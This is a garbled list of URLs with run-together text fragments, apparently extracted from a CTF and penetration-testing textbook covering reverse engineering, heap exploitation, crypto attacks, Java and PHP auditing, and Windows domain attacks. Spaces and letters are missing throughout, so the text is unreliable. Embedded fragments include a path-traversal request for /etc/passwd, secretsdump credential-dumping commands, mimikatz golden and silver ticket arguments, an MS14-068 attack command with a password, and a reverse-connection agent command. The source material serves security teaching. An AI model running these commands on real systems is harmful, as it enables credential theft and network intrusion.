http://sshell.art/dex2oat/dex2oat.ccAndroid8.xmakedex2oat//compilationandverication.verication_results_-
-
http://le.cc
-
http://Fig.4.16JEBFig.4.17liban-a.so
-
https://doi.org/10.1007/978-981-19-0336-6_5295
-
http://NTkernelbegantointroduceMinWinafterWindowsVista.ss
-
https://github.com/pwndbg/pwndbg.Youcanseetheinstallationstepsinthe�How�.Afterinstallation,thePwndbgpluginwillbeautomaticallyloadedeverytimeyoustartGDB.2.OpentheleYoucanmakeGDBopensthetargetleinthefollowingthreeways.1:Youcanspecifyanexecutableleintheformof�gdb./2-simpleCrackme�
-
http://visualgdb.com/gdbreference/commands/xforalistofformats.�p
-
http://justrunida_script.py
-
https://github.com/push0ebp/sig-databaseorhttps://github.com/Maktm/FLIRTDB.OryoucanmakeuseoftheFLAIRtoolprovidedwithintheIDASDK,createyourownsignaturebasedonexistingstaticlibraryleslike.a,.lib,etc.,putitinsigfolder,andthenloaditinIDA.FortheuseoftheFLAIRtool,pleaserefertotheInternetforinformation.3.BinarySimilarityDuetodifferencesinvariousways,suchascompilationagsorenvironments,signaturesmaynotmatchtheprovidedlibraryexactly.However,evenifthecompilationenvironmentisdifferent,therearesimilaritiesbetweencompiledlibraryfunctionsinbinariesthatusethesamelibrary.Ifweknowthattheprogrammerusedacertainlibrary,andifwecangetastaticallycompiledbinarylethatcontainsthedebugsymbolsandalsousesthelibrary,wecanusethebinarysimilarityapproachtoidentifyeachlibraryfunction.ApopulartoolforbinarycomparisonisBinDiff
-
https://www.zynamics.com/bindiff.html
-
http://dp.py
-
https://github.com/x64dbg/ScyllaHide
-
https://www.npointer.cn/question.html?id�5
-
http://at.py
-
https://security.tencent.com/index.php/blog/msg/112
-
https://www.hex-rays.com/blog/hex-rays-microcode-api-vs-obfus-cating-compiler/
-
https://kong.re.kr/?p�71.5functionsareimplementedbythistool,includingthesignatureloading,whichisthemostimportant,optimizestheidenticationofRustfunctions,thusreducinganalysistime.Theresultoftherust-reversing-helperoptimizationisshowninFig.5.83.YoucanseethatthefunctionnameintheleftFunctionnamepanelhasbeenoptimized,andwecanstarttoanalyzeitnow.Asageneralruleofthumb,wetendtoanalyzethestd__rt__lang_start_internalfunction.However,unliketheregularchallenges,std__rt__lang_start_internalisRust'sinitializationfunction,whichfunctionsasthestartfunction,andthefunctionbeginer_reverse__mainfunctioncanbefoundabovecallstd__rt__lang_start_internal,soinRust,themainfunctionisusedasanFig.5.82IDAloadRustprogram3805ReverseEngineering
-
http://Thefullpathtothe.py
-
http://simfd.read
-
http://self.state.memory.store
-
http://wecangetgoodresults.2.baby
-
http://sim_options.py
-
http://wesuccessfullyoptimizedthescriptruntimefrom8.461sto7.933s.3.sakura
-
http://simgr.one
-
http://state.memory.store
-
https://software.intel.com/sites/landingpage/pintool/docs/97619/Pin/html/index.html.5.7.3.4CTFPractice:RecordingtheNumberofExecutedInstructionsThissectiondescribeshowtousethisinstructioncountertosolvetheCTFchallenge.ThereversechallengeinCTFcanbeabstractedasthatagiveninputstringag,computedbysomealgorithmftogettheresultenc,andthencomparetheresultencwiththedataembeddedintheprogram.Inthecasethatachangeinsomebytesintheagwillonlyaffectsomebytesintheenc,thenonecanconsiderdividingtheagintomultiplesegments,brute-forceattackingtheinput,andtreatingthealgorithmfFig.5.107CountBblfunctionFig.5.108log.logleFig.5.106Tracefunction5.7ModernReverseEngineeringTechniques407
-
http://www.xuetr.com/?p�191.NotethatalthoughPCHuntersupportsWindows10,theauthorisoftenunabletoupdatethesoftwareontimeduetotherapidpaceofWindows10updates.Asofthiswriting,Windows10hasbeenupdatedtoversion1909,whiletheversionsupportedbyPCHunterisstillat1809.ItisrecommendedthatyoualwayshavealowerversionofWindowsvirtualmachine.
-
https://doi.org/10.1007/978-981-19-0336-6_6429
-
http://abledata.Unlike.data
-
http://libc.search
-
http://libc-2.27.so
-
http://elf.got
-
http://p3pointer.ch
-
https://github.com/pwndbg/pwndbg
-
https://github.com/shellphish/how2heap
-
https://packages.ubuntu.com/xenial/glibc-source.6.6.3.2FastBinAttackSection6.6.1describesFastBinasasingle-linkedLIFOstructureconnectedusingFDpointers.nGlibc2.25andearlier,afterachunkisfreed,itisrstdeterminedifitssizedoesnotexceedthesizeofglobal_max_fast,andifso,itisputintoFastBin,otherwiseotheroperationsareperformed.ThefollowingcodeisaninterceptionofthePtmalloc2sourcecodeinGlibc2.25regardingthehandlingofFastBin.Afterthesizeofthechunksatisestheconditionthatitdoesnotexceedglobal_max_fast,itwillalsodetermineifthesizeofthechunkexceedstheminimumchunkandissmallerthanthesystemmemory,andthenaddthechunktothechaintableofthecorrespondingsize.Fig.6.17UsegdbdebugGlibcsourcecode4626PWN
-
https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344
-
http://boot.sh
-
http://ddebs.ubuntu.com/gettingthecorrespondingversionofvmLinuxwithdebugsym-bolsandreplacingthebzImageofthechallenge,youcanusethekernelwithsymbolstoreverseanddebugmoreeasily.Inaddition,inthenewversionofthekernel,theactualaddressmaydeviatefromtheaddressinthekernelELF,whichmaycausetheGDBtofailtorecognizesymbols,whichcanbeavoidedbymodifyingQemu�sstartupparametersbyadding�nokaslr�.Thefullstartupparametersare.-append'console=ttyS0root=/dev/ramoops=panicpanic=1nokaslr'Thisway,whenthekernelstarts,theactualaddressmatchestheaddressinbinary.Butforkernelsthatdon�thaveaccesstosymbols,howdowesetbreakpoints?Thesymbolicaddresscanbeobtainedfrom�/proc/kallsyms�afterkernelstartup.#cat/proc/kallsyms|grepbabyffffffffc0000000tbabyrelease[babydriver]ffffffffc00024d0bbabydev_struct[babydriver]ffffffffc0000030tbabyopen[babydriver]ffffffffc0000080tbabyioctl[babydriver]ffffffffc00000f0tbabywrite[babydriver]ffffffffc0000130tbabyread[babydriver]ffffffffc0002440bbabydev_no[babydriver]6.7.6AnalyzingtheProgramAfterthepreviouspreparations,let�sgetdowntobusiness.Manypeoplethinkthatattackingthekernelisdifcult,andmaynditdifculttoanalyzethekernelbinary.Normally,becauseofthelimitedtimeavailableforthegame,itisalmostimpossibletocompletelyreversetheentirekernel,sothemaintaskistondthedriver-type4906PWN
-
https://wikipedia.org/.
-
https://doi.org/10.1007/978-981-19-0336-6_7553
-
https://atomcated.github.io/Vigenere/whichisinChinese
-
https://github.com/veritas501/attachment_in_blog/tree/master/Gadgetzan.7.3BlockCiphers577
-
http://forcrypto1ofpwnable.kr
-
http://f.read
-
http://functionintheLinuxGNUClibraryisasfollows.int
-
http://functionisimplementedasfollows.int
-
https://github.com/pablocelayes/rsa-wiener-attack.ConsiderthefollowingRSApublickey.n=154669541286774112800350345370909838892196173691617426023040329852908193564023067943e=2702993571650777060698579724900044231559809907862476240831366414804737810584549617#e,n,d=RSAvulnerableKeyGenerator.generateKeys
-
https://github.com/mimoo/RSA-and-LLL-attacks.7.RSALSBOracleThisisaside-channelattackmethod.Ifyoucancontrolthedecryptionprocessandusethesameunknownprivatekeytodecryptanarbitraryciphertextandcapturethelastbitoftheplaintext,thenyoucanusethisattackmethodtodecryptthecorrespondingplaintextinO
-
https://github.com/mimoo/RSA-and-LLL-attacks.7.5.3DiscreteLogarithms7.5.3.1ElGamalandECCTheElGamalencryptionisapublic-keycryptosystembasedondiscretelogarithms.ItscryptographicsecurityisbasedonthefactthatifpisalargeprimenumberandgisthegeneratorofthemultiplicativegroupZp*,itisrelativelysimpletochoosea6007Crypto
-
http://hashlib.md
-
https://github.com/bwall/HashPump.AnexampleofusingHashPumpisshowninFig.7.28.Entertheknownhashvalue,thedata,thelengthofthesalt
-
https://github.com/blockstack/secret-sharing.Thefollowingisthebasicusageofthelibrary.Forexample,wedividetheplaintextsecretinto5parts,andhold3partstogetthesecret:
-
https://doi.org/10.1007/978-981-19-0336-6_8609
-
https://infura.io
-
http://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258aThesourcecodeforsmartcontractsispubliclyavailableonEtherscan,andwecanperformsourcecodeauditsonEtherscan.FindthePayForFlagfunction,whichcanbeguessedtobethefunctionthatgivesustheag.Andthereisanauthenticatemodierforthisfunction.modierauthenticate{require
-
https://ropsten.infura.io/v3/xxxxx
-
http://tmp_v.to
-
http://Web3.to
-
http://personal.new
-
http://block.transactions.to
-
http://github.com/yuange1024/ethereum_yellowpaperTobetterexplaintheknowledgeinvolvedinthechallenge,hereisareferencesourcecodetoexplainthechallenge.https://github.com/Hcamael/ethre_source/blob/master/hctf2018.solAcontractcanbecreatedinacontractattheSoliditylevelwith�newHCTF2018User
-
http://eth.call
-
https://doi.org/10.1007/978-981-19-0336-6_9627
-
http://Image.open
-
http://breakimg.save
-
https://www.wireshark.org
-
http://wireshark.org/docs/man-pages/tshark.html.SeeFig.9.18foranexampleoflteringtheFTPprotocolinthesametrafcpacketasthepreviousexample.9.4.1.2CommonOperationsinTrafcAnalysisWireshark�s�Statistics�menuallowsyoutoviewthegeneralsituationoftrafcpackets,suchaswhichprotocolsareincluded,whichIPaddressesparticipatedinthesession,etc.Figures9.19and9.20showtheprotocolhierarchystatisticsandsessionstatisticsrespectively.ThesetwofunctionscanhelpusquicklylocatethetrafcweneedtoanalyzebecausetrafcanalysisinCTFoftenhasalotofnoisetrafc,andthetrafcrequiredbythechallengeauthorforthechallengeisusuallyobtainedintheLANorafewhosts,sobyviewingthetrafcinformation,wecangreatlysavethetimeofndingthetrafctoanalyze.ThemostwidelyusedtransportlayerprotocolincomputernetworksisTCP,aconnection-orientedprotocolthatallowsbothpartiestoensurethatthetransmissionistransparentandthattheyonlycareaboutthedatatheyget.However,inpractice,duetothepresenceofMTUs,TCPtrafccanbeslicedintomanysmallpackets,makingitdifculttoanalyze.Toaddressthissituation,WiresharkprovidesaFollowTCPStreamfeature,whichallowsyoutogetallthedatatransmittedbetweentwopartiesinaTCPsessionbyselectingadatagramandright-clicking�FollowTCPStream�.Fig.9.17WiresharkshowFTPprotocolFig.9.18TsharkshowFTPprotocol6409Misc
-
http://usb.org/sites/default/les/documents/hut1_12v2.pdfandhttps://usb.org/sites/default/les/.documents/hid1_11.pdf.TheUSBkeyboarddatagramhas8bytesatatime,asdenedinTable9.1.Sincekeysarenormallypressedoneatatimeinnormaluse,onlythekeycombinationstatusofbyte0andthekeycodeofbyte2needtobetakenintoaccount.Themeaningofthe8-bitkeycombinationofbyte0isshowninTable9.2.TheUSBmousedatagramis3bytes,seeTable9.3formoredetails.SeeFig.9.25
-
https://github.com/superponible/volatility-plugins.Whenthecommandsthatcomewiththeframeworkdon'tmeetyourneeds,lookforagoodplug-in.9.4.2.3MemoryImageForensicsSummaryThememoryforensicschallengescanbeeasilysolvedbyfamiliarizingourselveswiththeVolatilitytool�scommandsandbeingabletoanalyzetheextractedlesincombinationwithothertypesofknowledge
-
https://doi.org/10.1007/978-981-19-0336-6_10651
-
https://xdebug.org/download.phptodownloadacompatibleversionwithyourownenvironment
-
https://xdebug.org/wizard.php
-
http://makesurethattheuserwhothePHPwillberunningashaswritepermissionstothatdirectory.xdebug.pro
-
http://xdebug.pro
-
http://Onxdebug.auto
-
http://www.thinkphp.cn/down/1279.html
-
http://Getrequestvariablesautomatically.case
-
http://xxxxxx.com/download/le?name�test.docx&path�upload/doc/test.docxBasedonexperience,anarbitraryledownloadvulnerabilitymayexisthere.Thetestfoundthatby.http://xxxxxx.com/download/le?name�test.docx&path�.../.../.../.../.../etc/passwd/etc/passwd10.1PHPCodeAuditing673
-
https://github.com/sco4x0/huwangbei2018_easy_laravel.Duringthecompetition,hintinformationcanbefoundinsidetheHTMLsourcecode:https://github.com/qqqqqqvq/easy_laravel,youcandownloadpartofthecodedirectly,itisnotdifculttondthatthechallengeisbasedonLaravelframeworkbyauditingthecode.Thefollowingcodetellsushowaadministrator�saccountisgenerated;$factory-
-
http://qvq.im
-
https://the.bytecode.club/showthread.php?tid�5ifyourneedsomemoreinformation.Thebasiccommandsareasfollows.java-jarfernower.jarjarToDecompile.jardecomp/wherejarToDecompile.jarrepresentstheJARpackagetobedecompiled,anddecomprepresentsthedirectorywherethedecompilationresultsarestored.2.JD-GUIJavadecompilerisalsoadecompilertoolrecognizedbymanysecuritypractitionerswithagraphicalinterface,seeFig.10.47.Selectthe�File!OpenFile�menucommand,andthenselecttheJARandWARlesthatneedtobedecompiled,asshowninFig.10.48.10.2.4IntroductiontoServletsServletisacomponentspecication
-
http://importjava.io
-
http://itrequirestheexistenceofaparameter-freeconstructorintheparentclass.Therelevantinterfacesandclassesareasfollows.java.io.Serializablejava.io
-
http://todeserializetheobject.objectInputStream.read
-
http://meansthatboththeclassitselfanditssubclassescanbeserializedwiththeJDK.Forexample.importjava.io
-
http://objectInputStream.read
-
http://inwhichcasetheprogramwillraiseajava.io
-
http://this.name
-
http://this.group
-
http://this.id
-
http://chain.do
-
http://returnois.read
-
http://returnbos.to
-
http://copytheToolsandClientinfocodeintoTools.javaandClientinfo.java
-
http://baseClass.is
-
https://jira.jboss.org/jira/browse/RF-8064out.ush
-
https://xz.aliyun.com/t/3264forthoseinterested.ELwillbedescribedandanalyzedindetaillater.10.2.7ExpressionInjection10.2.7.1ExpressionInjectionOverviewFortheJavaWeb,therearetwocommontypesofvulnerabilitiesthatcancausecommandexecution:deserializationandExpressionLanguageInjection,whichareessentiallyremotecommandexecutionorremotecodeexecutionvulnerabilities.However,theseRCEvulnerabilitiesallshareacommonfeature�theyaretheresultofpoorlteringorabuseoffeaturesthatallowsanattackertoconstructacorrespondingexpressiontotriggeracommandorcodeexecutionvulnerability.10.2JavaCodeAuditing705
-
http://Calculator.app
-
http://o.to
-
http://contentType.to
-
http://bf.read
-
http://AttacklimitsOraclehassetcom.sun.jndi.rmi.object.trust
-
http://decodeObjectfromaremotelocation.Oraclesetscom.sun.jndi.ldap.object.trust
-
http://www.veracode.com/blog/research/exploiting-jndi-injections-java10.2.8.2DeserializationExploitToolysoserial/marshalsecysoserial/marshalsecarebothdeserializationGadgetassemblies.Whenadeserializationvulnerabilityisfound,astringofserializationdataneedstobepassedtothedeserializationfunctioncallstomakeitcompletethedeserializationandperformtheoperationweexpect
-
http://github.com/apache/shiro.gitgitcheckoutshiro-root-1.2.4/shiro/samples/web/shiro/samples/webNext,togetshiroupandrunning,youneedtomodifythepom.xmllebyaddingthefollowingcode.Fig.10.57Result72010CodeAuditing
-
http://shiro.rrjva1.ceye.io
-
http://popen.stdout.read
-
https://doi.org/10.1007/978-981-19-0336-6_11725
-
https://github.com/wupco/weblogger.
-
http://session.save
-
https://doi.org/10.1007/978-981-19-0336-6_12737
-
https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/cong/templates/metasploit-framework-wrappers/msfupdate.erb
-
http://nmap.org/book/inst-source.html.Aftersuccessfulinstallation,enterthecommand�nmap�intheterminal,whichwilloutputabriefusermanualforthenmap,seeFig.12.10.ThebasicuseofNmapisasfollows.Pleasenoticethatsomeofitsparameterscanbeusedtogether.
-
https://github.com/ro0r/proxychains-ng.gitcdproxychains-ng./congure--prex=/usr/local/Fig.12.12ResultFig.12.13Result12.1CreatingaPenetrationTestEnvironment745
-
https://github.com/vanhauser-thc/thc-hydra./conguremakemakeinstallExecutionofthe�hydra�commandwilloutputthecontentsofthehelpparameterbydefault,seeFig.12.18.Readerscantrytondhowtousethistoolontheirown.12.1.5InstallationofPentestBoxonWindowsPentestBoxisopen-sourcesoftwareforWindowsoperatingsystems,analogoustoKali,thatcanbeusedtopenetratetestingenvironments,withcommonsecuritytoolsFig.12.17TheinstallationcommandsonUbuntu74812VirtualTargetPenetrationTest
-
https://github.com/Dliv3/Venom.
-
https://github.com/Dliv3/Venom/releases/download/v1.0.2/Venom.v1.0.2.7z.Thedirectorystructureisasfollows.tree/FFolderPATHListRollserialnumberis8C06-787EC:.DS_Storeadmin.exeadmin_linux_x64admin_linux_x86admin_macos_x64agent.exeagent_arm_eabi5agent_linux_x64agent_linux_x86agent_macos_x64agent_mipsel_version1scriptsport_reuse.pySupposeyouhavesuccessfullytakendowntherstmachine,uploadthecom-piledletothetargethost,andthenstarttheserver.Ifthetargetdoesnothaveapublicnetworkaddressorarewallexists,soyoucannotaccessthetargetportdirectly,andyouneedtoestablishareverseconnection,thatistouseadminclienttolistensontheportasaservertobeconnected,andtheagentnodemakesanactiveconnectiontotheserver.Inthisway,wecanbypasstherestrictionofanyexistingrewalls.Andthecommandneededisasfollows.Enablelisteningonport8888ontheserver,seeFig.12.27../admin_linux_x64-lport8888Next,runtheagentonthejumoboxtoconnecttotheserverside,seeFig.12.28.agent.exe-rhost192.168.40.145-rport8888Ontheadminsideyoucanseethattheconnectionisestablished,entertheaddednode,andlistthecommandsavailable,seeFig.12.29.Thefollowingsectionexplainstheuseofportforwarding,wheretherearetwoportforwardingfunctions:localportforwardingandremoteportforwarding.12.2PortForwardingandProxies755
-
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/12.3.2ms14-068Defensivedetectionmethodsforthems14-068vulnerabilityattackarewellestablished,andtheKerberosauthenticationknowledgewillbedescribedinSect.12.5.2.1.BecausethereisnoprivilegechekckingmechanisminKerberos,whenMicrosoft�simplementationoftheKerberosprotocol,theyincludePAC
-
http://pythongoldenPac.pyweb.lctf.com/buguake:xdsec@lctf2018@sub-dc.web.lctf.com-dc-ip172.21.0.7-target-ip172.21.0.7cmdThenalresultoftheimplementationissimilartoFig.12.39.Fig.12.37Usemimikatztoreadthepassword76212VirtualTargetPenetrationTest
-
https://github.com/worawit/MS17-010,whichismoreversatile,becausethetargetversionofthetestislow,sousezzz_exploit.py,andmodifythesmb_pwnfunctionwhosebehaviordefaultstocreateaTXTleontheCdrive,whileweneedtomodifyittoexecuteacommandoruploadanexecutablele,asshowninFig.12.41.Then,Metasploitisusedtogenerateanexecutablelenamedbind86.exeandplacesitinthescriptexecutiondirectory.Atthesametime,youshouldmakeMetasploitbegintolistensforbackdoorconnections
-
https://docs.microsoft.com/en-us/sysinternals/downloads/autologonformoredetails.
-
http://sam.save
-
http://security.save
-
http://system.save
-
http://examplesfolderandloadthemusingtheImpacketsecretsdumpscript.secretsdump.py-samsam.save-securitysecurity.save-systemsystem.save
-
https://docs.microsoft.com/en-us/windows/desktop/secauthn/lsa-authentication.Fig.12.45Result76812VirtualTargetPenetrationTest
-
https://github.com/PowerShellMaa/PowerSploit/blob/master/Exltration/Invoke-NinjaCopy.ps1.Thecommandisasfollows.Powershell
-
http://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.pyPythonsecretsdump.py-samsam.save-systemsystem.saveLOCAL12.4.2.2ViaDomainController�sNTDS.ditFileLikeSAMforthelocalmachine,NTDS.ditisthedatabasethatholdsthedomainuser�sidentitycredentialsandisstoredonthedomaincontroller.ThepathisC:
-
http://whichcanbeusedtomaintainpermissionsinsubsequentstages.Therearetwowaystoretrievestoredidentitycredentials.1.RemoteextractionUsethesecretsdump.pyscriptfromimpackettoextractthepasswordhashremotelyviadcsyncwiththefollowingcommand.secretsdump.py
-
https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1.ThisscriptcopiesSAM,SYSTEM,andntds.ditdirectlytoauser-controllablelocation,seeFig.12.56.Thesecretsdump.pyscriptinimpacketimplementsthefunctionofextractingthepasswordhashfromntds.ditusingthebootkeyinsystem,withthefollowingcommand
-
http://pythonsecretsdump.py
-
http://system.hiv
-
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html.77812VirtualTargetPenetrationTest
-
http://scanf.com/user:krbtgt�Thecommandtogenerateagoldenticketisasfollows
-
http://scanf.com/sid:sid/krbtgt:hash/endin:480/renewmax:10080/pttThereisdetailedhelpforusingtheabovecommandsonthereferencepage,soIwon�tgointotoomuchdetailhere.ThefollowingaspectsneedtobeconsideredwhenusingGoldenTickets.�ThedomainKerberospolicytrustsbydefaulttheexpirationtimeoftheticket.�Thekrbtgtpasswordhasbeenchangedtwiceinarowandthegoldenticketisinvalid.�Goldenticketscanbegeneratedandusedonanyhostthatcancommunicatewiththedomaincontroller.Fig.12.63Authenticationprocess78212VirtualTargetPenetrationTest
-
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos.Fig.12.64AttackstepsFig.12.65Result12.5LateralMovement783
-
http://scanf.com/sid:S-1-5-21-2256421489-3054245480-2050417719/target:DC.scanf.com/sid:S-1-5-21-2256421489-3054245480-2050417719rc4:83799921ccee1abbdeac4e9070614e7/service:cifs/pttTable12.2ThedifferencebetweengoldandsilverticketsTypeofserviceServicenameWMIHOST,PRCSSPowerShellremotingHOST,HTTPWinRMHOST,HTTPScheduledtasksHOSTWindowsleshareCIFSLDAPLDAPWindowsremoteadministrationtoolsRPCSS,LDAP,CIFSFig.12.67Result12.5LateralMovement785
-
http://scanf.com/user:krbtgt�Referencewebpages:https://adsecurity.org/?p�2011,https://adsecurity.org/?p�1640,https://adsecurity.org/?p�1515Fig.12.70ResultFig.12.71Result12.5LateralMovement787
-
http://les.pythonCVE-2017-11882.py
-
http://github.com/abatchy17/WindowsExploits/tree/master/MS14-068Youcanusethefollowingcommandstolaunchtheattack.ms14-068.exe-uDomainmember@domain-sDomainmembersid-dDomaincontrolleraddress-pDomainmemberpasswordMS14-068.exe-upc@ad.com-sS-1-5-21-2251846888-1669908150-1970748206-1116-d192.168.2.10-padmin@test.COMThesidofadomainmemberisobtainedthroughthemigratingtotheprocesslaunchedbyAD
- Show all
-